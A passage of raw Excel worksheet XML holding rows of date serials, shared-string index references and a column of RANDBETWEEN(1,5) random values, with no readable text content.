    <row r="20032" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20032" s="1">
        <v>43126.196956018517</v>
      </c>
      <c r="C20032" t="s">
        <v>48</v>
      </c>
      <c r="E20032" t="s">
        <v>17995</v>
      </c>
      <c r="F20032">
        <f t="shared" ca="1" si="312"/>
        <v>2</v>
      </c>
    </row>
    <row r="20033" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20033" s="1">
        <v>43126.148101851853</v>
      </c>
      <c r="C20033" t="s">
        <v>124</v>
      </c>
      <c r="E20033" s="2" t="s">
        <v>17996</v>
      </c>
      <c r="F20033">
        <f t="shared" ca="1" si="312"/>
        <v>1</v>
      </c>
    </row>
    <row r="20034" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A20034" s="1">
        <v>43126.113043981481</v>
      </c>
      <c r="C20034" t="s">
        <v>10</v>
      </c>
      <c r="D20034" t="s">
        <v>6</v>
      </c>
      <c r="E20034" s="2" t="s">
        <v>17997</v>
      </c>
      <c r="F20034">
        <f t="shared" ref="F20034:F20097" ca="1" si="313">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="20035" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20035" s="1">
        <v>43126.025358796294</v>
      </c>
      <c r="C20035" t="s">
        <v>1179</v>
      </c>
      <c r="D20035" t="s">
        <v>232</v>
      </c>
      <c r="E20035" s="2" t="s">
        <v>17839</v>
      </c>
      <c r="F20035">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20036" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20036" s="1">
        <v>43125.948622685188</v>
      </c>
      <c r="C20036" t="s">
        <v>118</v>
      </c>
      <c r="D20036" t="s">
        <v>312</v>
      </c>
      <c r="E20036" t="s">
        <v>17998</v>
      </c>
      <c r="F20036">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20037" s="1">
        <v>43125.82571759259</v>
      </c>
      <c r="C20037" t="s">
        <v>776</v>
      </c>
      <c r="D20037" t="s">
        <v>163</v>
      </c>
      <c r="E20037" t="s">
        <v>17999</v>
      </c>
      <c r="F20037">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20038" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20038" s="1">
        <v>43125.825439814813</v>
      </c>
      <c r="C20038" t="s">
        <v>749</v>
      </c>
      <c r="D20038" t="s">
        <v>1091</v>
      </c>
      <c r="E20038" s="2" t="s">
        <v>18000</v>
      </c>
      <c r="F20038">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20039" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20039" s="1">
        <v>43125.74863425926</v>
      </c>
      <c r="C20039" t="s">
        <v>10</v>
      </c>
      <c r="D20039" t="s">
        <v>163</v>
      </c>
      <c r="E20039" t="s">
        <v>18001</v>
      </c>
      <c r="F20039">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20040" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A20040" s="1">
        <v>43125.746412037035</v>
      </c>
      <c r="C20040" t="s">
        <v>10</v>
      </c>
      <c r="D20040" t="s">
        <v>17</v>
      </c>
      <c r="E20040" s="2" t="s">
        <v>18002</v>
      </c>
      <c r="F20040">
        <f t="shared" ca="1" si="313"/>
        <v>2</v>
      </c>
    </row>
    <row r="20041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20041" s="1">
        <v>43125.728356481479</v>
      </c>
      <c r="C20041" t="s">
        <v>10</v>
      </c>
      <c r="D20041" t="s">
        <v>6</v>
      </c>
      <c r="E20041" t="s">
        <v>18003</v>
      </c>
      <c r="F20041">
        <f t="shared" ca="1" si="313"/>
        <v>2</v>
      </c>
    </row>
    <row r="20042" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20042" s="1">
        <v>43125.728032407409</v>
      </c>
      <c r="C20042" t="s">
        <v>10</v>
      </c>
      <c r="D20042" t="s">
        <v>251</v>
      </c>
      <c r="E20042" s="2" t="s">
        <v>18004</v>
      </c>
      <c r="F20042">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20043" s="1">
        <v>43125.705729166664</v>
      </c>
      <c r="C20043" t="s">
        <v>10</v>
      </c>
      <c r="D20043" t="s">
        <v>158</v>
      </c>
      <c r="E20043" t="s">
        <v>18005</v>
      </c>
      <c r="F20043">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20044" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A20044" s="1">
        <v>43125.70003472222</v>
      </c>
      <c r="C20044" t="s">
        <v>6</v>
      </c>
      <c r="D20044" t="s">
        <v>25</v>
      </c>
      <c r="E20044" s="2" t="s">
        <v>18006</v>
      </c>
      <c r="F20044">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20045" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20045" s="1">
        <v>43125.694594907407</v>
      </c>
      <c r="C20045" t="s">
        <v>10</v>
      </c>
      <c r="D20045" t="s">
        <v>14</v>
      </c>
      <c r="E20045" t="s">
        <v>18007</v>
      </c>
      <c r="F20045">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20046" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20046" s="1">
        <v>43125.686273148145</v>
      </c>
      <c r="C20046" t="s">
        <v>6</v>
      </c>
      <c r="D20046" t="s">
        <v>25</v>
      </c>
      <c r="E20046" s="2" t="s">
        <v>18008</v>
      </c>
      <c r="F20046">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20047" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20047" s="1">
        <v>43125.680358796293</v>
      </c>
      <c r="C20047" t="s">
        <v>10</v>
      </c>
      <c r="D20047" t="s">
        <v>56</v>
      </c>
      <c r="E20047" s="2" t="s">
        <v>18009</v>
      </c>
      <c r="F20047">
        <f t="shared" ca="1" si="313"/>
        <v>2</v>
      </c>
    </row>
    <row r="20048" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20048" s="1">
        <v>43125.678136574075</v>
      </c>
      <c r="C20048" t="s">
        <v>10</v>
      </c>
      <c r="D20048" t="s">
        <v>6</v>
      </c>
      <c r="E20048" t="s">
        <v>18010</v>
      </c>
      <c r="F20048">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20049" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20049" s="1">
        <v>43125.65934027778</v>
      </c>
      <c r="C20049" t="s">
        <v>10</v>
      </c>
      <c r="D20049" t="s">
        <v>52</v>
      </c>
      <c r="E20049" t="s">
        <v>18011</v>
      </c>
      <c r="F20049">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20050" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20050" s="1">
        <v>43125.65929398148</v>
      </c>
      <c r="C20050" t="s">
        <v>156</v>
      </c>
      <c r="D20050" t="s">
        <v>271</v>
      </c>
      <c r="E20050" s="2" t="s">
        <v>15027</v>
      </c>
      <c r="F20050">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20051" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20051" s="1">
        <v>43125.618020833332</v>
      </c>
      <c r="C20051" t="s">
        <v>10</v>
      </c>
      <c r="D20051" t="s">
        <v>20</v>
      </c>
      <c r="E20051" t="s">
        <v>18012</v>
      </c>
      <c r="F20051">
        <f t="shared" ca="1" si="313"/>
        <v>2</v>
      </c>
    </row>
    <row r="20052" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20052" s="1">
        <v>43125.574895833335</v>
      </c>
      <c r="C20052" t="s">
        <v>10</v>
      </c>
      <c r="D20052" t="s">
        <v>86</v>
      </c>
      <c r="E20052" s="2" t="s">
        <v>18013</v>
      </c>
      <c r="F20052">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20053" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A20053" s="1">
        <v>43125.562928240739</v>
      </c>
      <c r="C20053" t="s">
        <v>10</v>
      </c>
      <c r="D20053" t="s">
        <v>244</v>
      </c>
      <c r="E20053" s="2" t="s">
        <v>18014</v>
      </c>
      <c r="F20053">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20054" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20054" s="1">
        <v>43125.562071759261</v>
      </c>
      <c r="C20054" t="s">
        <v>6</v>
      </c>
      <c r="D20054" t="s">
        <v>194</v>
      </c>
      <c r="E20054" s="2" t="s">
        <v>18015</v>
      </c>
      <c r="F20054">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20055" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20055" s="1">
        <v>43125.547523148147</v>
      </c>
      <c r="C20055" t="s">
        <v>10</v>
      </c>
      <c r="D20055" t="s">
        <v>151</v>
      </c>
      <c r="E20055" t="s">
        <v>18016</v>
      </c>
      <c r="F20055">
        <f t="shared" ca="1" si="313"/>
        <v>2</v>
      </c>
    </row>
    <row r="20056" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20056" s="1">
        <v>43125.543668981481</v>
      </c>
      <c r="C20056" t="s">
        <v>10</v>
      </c>
      <c r="D20056" t="s">
        <v>1091</v>
      </c>
      <c r="E20056" t="s">
        <v>18017</v>
      </c>
      <c r="F20056">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20057" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20057" s="1">
        <v>43125.535486111112</v>
      </c>
      <c r="C20057" t="s">
        <v>10</v>
      </c>
      <c r="D20057" t="s">
        <v>163</v>
      </c>
      <c r="E20057" s="2" t="s">
        <v>18018</v>
      </c>
      <c r="F20057">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20058" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20058" s="1">
        <v>43125.507569444446</v>
      </c>
      <c r="C20058" t="s">
        <v>6</v>
      </c>
      <c r="D20058" t="s">
        <v>25</v>
      </c>
      <c r="E20058" s="2" t="s">
        <v>18019</v>
      </c>
      <c r="F20058">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20059" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20059" s="1">
        <v>43125.507141203707</v>
      </c>
      <c r="C20059" t="s">
        <v>2225</v>
      </c>
      <c r="E20059" t="s">
        <v>18020</v>
      </c>
      <c r="F20059">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20060" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20060" s="1">
        <v>43125.497210648151</v>
      </c>
      <c r="C20060" t="s">
        <v>10</v>
      </c>
      <c r="D20060" t="s">
        <v>381</v>
      </c>
      <c r="E20060" t="s">
        <v>18021</v>
      </c>
      <c r="F20060">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20061" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20061" s="1">
        <v>43125.491099537037</v>
      </c>
      <c r="C20061" t="s">
        <v>10</v>
      </c>
      <c r="D20061" t="s">
        <v>178</v>
      </c>
      <c r="E20061" t="s">
        <v>18022</v>
      </c>
      <c r="F20061">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20062" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20062" s="1">
        <v>43125.468136574076</v>
      </c>
      <c r="C20062" t="s">
        <v>71</v>
      </c>
      <c r="E20062" t="s">
        <v>18023</v>
      </c>
      <c r="F20062">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20063" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20063" s="1">
        <v>43125.456099537034</v>
      </c>
      <c r="C20063" t="s">
        <v>10</v>
      </c>
      <c r="D20063" t="s">
        <v>192</v>
      </c>
      <c r="E20063" t="s">
        <v>18024</v>
      </c>
      <c r="F20063">
        <f t="shared" ca="1" si="313"/>
        <v>2</v>
      </c>
    </row>
    <row r="20064" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A20064" s="1">
        <v>43125.452835648146</v>
      </c>
      <c r="C20064" t="s">
        <v>430</v>
      </c>
      <c r="E20064" s="2" t="s">
        <v>18025</v>
      </c>
      <c r="F20064">
        <f t="shared" ca="1" si="313"/>
        <v>2</v>
      </c>
    </row>
    <row r="20065" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20065" s="1">
        <v>43125.445532407408</v>
      </c>
      <c r="C20065" t="s">
        <v>10</v>
      </c>
      <c r="E20065" t="s">
        <v>18026</v>
      </c>
      <c r="F20065">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20066" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20066" s="1">
        <v>43125.428842592592</v>
      </c>
      <c r="C20066" t="s">
        <v>10</v>
      </c>
      <c r="D20066" t="s">
        <v>80</v>
      </c>
      <c r="E20066" t="s">
        <v>18027</v>
      </c>
      <c r="F20066">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20067" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20067" s="1">
        <v>43125.368761574071</v>
      </c>
      <c r="C20067" t="s">
        <v>10</v>
      </c>
      <c r="D20067" t="s">
        <v>163</v>
      </c>
      <c r="E20067" s="2" t="s">
        <v>18018</v>
      </c>
      <c r="F20067">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20068" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20068" s="1">
        <v>43125.36005787037</v>
      </c>
      <c r="C20068" t="s">
        <v>16</v>
      </c>
      <c r="E20068" s="2" t="s">
        <v>18028</v>
      </c>
      <c r="F20068">
        <f t="shared" ca="1" si="313"/>
        <v>2</v>
      </c>
    </row>
    <row r="20069" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A20069" s="1">
        <v>43125.355949074074</v>
      </c>
      <c r="C20069" t="s">
        <v>103</v>
      </c>
      <c r="E20069" s="2" t="s">
        <v>18029</v>
      </c>
      <c r="F20069">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20070" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20070" s="1">
        <v>43125.355208333334</v>
      </c>
      <c r="C20070" t="s">
        <v>10</v>
      </c>
      <c r="D20070" t="s">
        <v>11</v>
      </c>
      <c r="E20070" s="2" t="s">
        <v>18030</v>
      </c>
      <c r="F20070">
        <f t="shared" ca="1" si="313"/>
        <v>2</v>
      </c>
    </row>
    <row r="20071" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20071" s="1">
        <v>43125.355173611111</v>
      </c>
      <c r="C20071" t="s">
        <v>10</v>
      </c>
      <c r="D20071" t="s">
        <v>11</v>
      </c>
      <c r="E20071" s="2" t="s">
        <v>18030</v>
      </c>
      <c r="F20071">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20072" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20072" s="1">
        <v>43125.287395833337</v>
      </c>
      <c r="C20072" t="s">
        <v>454</v>
      </c>
      <c r="D20072" t="s">
        <v>67</v>
      </c>
      <c r="E20072" s="2" t="s">
        <v>18031</v>
      </c>
      <c r="F20072">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20073" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20073" s="1">
        <v>43125.283182870371</v>
      </c>
      <c r="C20073" t="s">
        <v>41</v>
      </c>
      <c r="E20073" t="s">
        <v>18032</v>
      </c>
      <c r="F20073">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20074" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20074" s="1">
        <v>43125.265706018516</v>
      </c>
      <c r="C20074" t="s">
        <v>41</v>
      </c>
      <c r="E20074" t="s">
        <v>18033</v>
      </c>
      <c r="F20074">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20075" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A20075" s="1">
        <v>43125.259166666663</v>
      </c>
      <c r="C20075" t="s">
        <v>2545</v>
      </c>
      <c r="E20075" s="2" t="s">
        <v>18034</v>
      </c>
      <c r="F20075">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20076" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A20076" s="1">
        <v>43125.251643518517</v>
      </c>
      <c r="C20076" t="s">
        <v>48</v>
      </c>
      <c r="E20076" s="2" t="s">
        <v>18035</v>
      </c>
      <c r="F20076">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20077" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A20077" s="1">
        <v>43125.221400462964</v>
      </c>
      <c r="C20077" t="s">
        <v>65</v>
      </c>
      <c r="E20077" s="2" t="s">
        <v>18036</v>
      </c>
      <c r="F20077">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20078" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20078" s="1">
        <v>43125.217951388891</v>
      </c>
      <c r="C20078" t="s">
        <v>124</v>
      </c>
      <c r="E20078" t="s">
        <v>18037</v>
      </c>
      <c r="F20078">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20079" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20079" s="1">
        <v>43125.21738425926</v>
      </c>
      <c r="C20079" t="s">
        <v>8872</v>
      </c>
      <c r="E20079" s="2" t="s">
        <v>18038</v>
      </c>
      <c r="F20079">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20080" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20080" s="1">
        <v>43125.214224537034</v>
      </c>
      <c r="C20080" t="s">
        <v>1510</v>
      </c>
      <c r="F20080">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20081" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A20081" s="1">
        <v>43125.208275462966</v>
      </c>
      <c r="C20081" t="s">
        <v>71</v>
      </c>
      <c r="E20081" s="2" t="s">
        <v>18039</v>
      </c>
      <c r="F20081">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20082" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20082" s="1">
        <v>43125.194710648146</v>
      </c>
      <c r="C20082" t="s">
        <v>410</v>
      </c>
      <c r="E20082" s="2" t="s">
        <v>18040</v>
      </c>
      <c r="F20082">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20083" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20083" s="1">
        <v>43125.174768518518</v>
      </c>
      <c r="C20083" t="s">
        <v>461</v>
      </c>
      <c r="E20083" t="s">
        <v>18041</v>
      </c>
      <c r="F20083">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20084" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20084" s="1">
        <v>43125.149074074077</v>
      </c>
      <c r="C20084" t="s">
        <v>2428</v>
      </c>
      <c r="E20084" t="s">
        <v>18042</v>
      </c>
      <c r="F20084">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20085" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20085" s="1">
        <v>43125.146585648145</v>
      </c>
      <c r="C20085" t="s">
        <v>410</v>
      </c>
      <c r="E20085" s="2" t="s">
        <v>18043</v>
      </c>
      <c r="F20085">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20086" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20086" s="1">
        <v>43125.140092592592</v>
      </c>
      <c r="C20086" t="s">
        <v>73</v>
      </c>
      <c r="E20086" s="2" t="s">
        <v>18044</v>
      </c>
      <c r="F20086">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20087" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20087" s="1">
        <v>43125.072511574072</v>
      </c>
      <c r="C20087" t="s">
        <v>258</v>
      </c>
      <c r="D20087" t="s">
        <v>330</v>
      </c>
      <c r="E20087" t="s">
        <v>18045</v>
      </c>
      <c r="F20087">
        <f t="shared" ca="1" si="313"/>
        <v>4</v>
      </c>
    </row>
    <row r="20088" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A20088" s="1">
        <v>43125.070393518516</v>
      </c>
      <c r="C20088" t="s">
        <v>10</v>
      </c>
      <c r="D20088" t="s">
        <v>6</v>
      </c>
      <c r="E20088" s="2" t="s">
        <v>18046</v>
      </c>
      <c r="F20088">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20089" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A20089" s="1">
        <v>43125.06523148148</v>
      </c>
      <c r="C20089" t="s">
        <v>197</v>
      </c>
      <c r="E20089" s="2" t="s">
        <v>18047</v>
      </c>
      <c r="F20089">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20090" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A20090" s="1">
        <v>43124.996527777781</v>
      </c>
      <c r="C20090" t="s">
        <v>1077</v>
      </c>
      <c r="D20090" t="s">
        <v>11</v>
      </c>
      <c r="E20090" s="2" t="s">
        <v>18048</v>
      </c>
      <c r="F20090">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20091" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A20091" s="1">
        <v>43124.982233796298</v>
      </c>
      <c r="C20091" t="s">
        <v>410</v>
      </c>
      <c r="E20091" s="2" t="s">
        <v>18049</v>
      </c>
      <c r="F20091">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20092" s="1">
        <v>43124.94734953704</v>
      </c>
      <c r="C20092" t="s">
        <v>410</v>
      </c>
      <c r="E20092" t="s">
        <v>18050</v>
      </c>
      <c r="F20092">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20093" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20093" s="1">
        <v>43124.937002314815</v>
      </c>
      <c r="C20093" t="s">
        <v>197</v>
      </c>
      <c r="D20093" t="s">
        <v>232</v>
      </c>
      <c r="E20093" t="s">
        <v>18051</v>
      </c>
      <c r="F20093">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20094" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20094" s="1">
        <v>43124.92559027778</v>
      </c>
      <c r="C20094" t="s">
        <v>9609</v>
      </c>
      <c r="D20094" t="s">
        <v>244</v>
      </c>
      <c r="E20094" t="s">
        <v>18052</v>
      </c>
      <c r="F20094">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20095" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20095" s="1">
        <v>43124.83797453704</v>
      </c>
      <c r="C20095" t="s">
        <v>7058</v>
      </c>
      <c r="D20095" t="s">
        <v>244</v>
      </c>
      <c r="E20095" t="s">
        <v>18053</v>
      </c>
      <c r="F20095">
        <f t="shared" ca="1" si="313"/>
        <v>1</v>
      </c>
    </row>
    <row r="20096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20096" s="1">
        <v>43124.738298611112</v>
      </c>
      <c r="C20096" t="s">
        <v>10</v>
      </c>
      <c r="D20096" t="s">
        <v>158</v>
      </c>
      <c r="E20096" t="s">
        <v>18054</v>
      </c>
      <c r="F20096">
        <f t="shared" ca="1" si="313"/>
        <v>5</v>
      </c>
    </row>
    <row r="20097" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A20097" s="1">
        <v>43124.722604166665</v>
      </c>
      <c r="C20097" t="s">
        <v>10</v>
      </c>
      <c r="D20097" t="s">
        <v>20</v>
      </c>
      <c r="E20097" s="2" t="s">
        <v>18055</v>
      </c>
      <c r="F20097">
        <f t="shared" ca="1" si="313"/>
        <v>3</v>
      </c>
    </row>
    <row r="20098" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A20098" s="1">
        <v>43124.707916666666</v>
      </c>
      <c r="C20098" t="s">
        <v>10</v>
      </c>
      <c r="D20098" t="s">
        <v>993</v>
      </c>
      <c r="E20098" s="2" t="s">
        <v>18056</v>
      </c>
      <c r="F20098">
        <f t="shared" ref="F20098:F20161" ca="1" si="314">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="20099" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20099" s="1">
        <v>43124.691238425927</v>
      </c>
      <c r="C20099" t="s">
        <v>10</v>
      </c>
      <c r="D20099" t="s">
        <v>36</v>
      </c>
      <c r="E20099" t="s">
        <v>18057</v>
      </c>
      <c r="F20099">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20100" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20100" s="1">
        <v>43124.691030092596</v>
      </c>
      <c r="C20100" t="s">
        <v>10</v>
      </c>
      <c r="D20100" t="s">
        <v>6</v>
      </c>
      <c r="E20100" s="2" t="s">
        <v>18058</v>
      </c>
      <c r="F20100">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20101" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20101" s="1">
        <v>43124.683541666665</v>
      </c>
      <c r="C20101" t="s">
        <v>10</v>
      </c>
      <c r="D20101" t="s">
        <v>94</v>
      </c>
      <c r="E20101" t="s">
        <v>18059</v>
      </c>
      <c r="F20101">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20102" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A20102" s="1">
        <v>43124.678333333337</v>
      </c>
      <c r="C20102" t="s">
        <v>10</v>
      </c>
      <c r="D20102" t="s">
        <v>89</v>
      </c>
      <c r="E20102" s="2" t="s">
        <v>18060</v>
      </c>
      <c r="F20102">
        <f t="shared" ca="1" si="314"/>
        <v>3</v>
      </c>
    </row>
    <row r="20103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20103" s="1">
        <v>43124.647685185184</v>
      </c>
      <c r="C20103" t="s">
        <v>10</v>
      </c>
      <c r="D20103" t="s">
        <v>89</v>
      </c>
      <c r="E20103" t="s">
        <v>18061</v>
      </c>
      <c r="F20103">
        <f t="shared" ca="1" si="314"/>
        <v>4</v>
      </c>
    </row>
    <row r="20104" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A20104" s="1">
        <v>43124.615277777775</v>
      </c>
      <c r="C20104" t="s">
        <v>10</v>
      </c>
      <c r="D20104" t="s">
        <v>244</v>
      </c>
      <c r="E20104" s="2" t="s">
        <v>18062</v>
      </c>
      <c r="F20104">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20105" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20105" s="1">
        <v>43124.602187500001</v>
      </c>
      <c r="C20105" t="s">
        <v>10</v>
      </c>
      <c r="D20105" t="s">
        <v>163</v>
      </c>
      <c r="E20105" t="s">
        <v>18063</v>
      </c>
      <c r="F20105">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
    <row r="20106" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A20106" s="1">
        <v>43124.595034722224</v>
      </c>
      <c r="C20106" t="s">
        <v>10</v>
      </c>
      <c r="D20106" t="s">
        <v>41</v>
      </c>
      <c r="E20106" t="s">
        <v>18064</v>
      </c>
      <c r="F20106">
        <f t="shared" ca="1" si="314"/>
        <v>2</v>
      </c>
    </row>
    <row r="20107" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A20107" s="1">
        <v>43124.528055555558</v>
      </c>
      <c r="C20107" t="s">
        <v>10</v>
      </c>
      <c r="D20107" t="s">
        <v>112</v>
      </c>
      <c r="E20107" s="2" t="s">
        <v>18065</v>
      </c>
      <c r="F20107">
        <f t="shared" ca="1" si="314"/>
        <v>1</v>
      </c>
    </row>
    <row r="20108" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A20108" s="1">
        <v>43124.516168981485</v>
      </c>
      <c r="C20108" t="s">
        <v>124</v>
      </c>
      <c r="E20108" s="2" t="s">
        <v>18066</v>
      </c>
      <c r="F20108">
        <f t="shared" ca="1" si="314"/>
        <v>5</v>
      </c>
    </row>
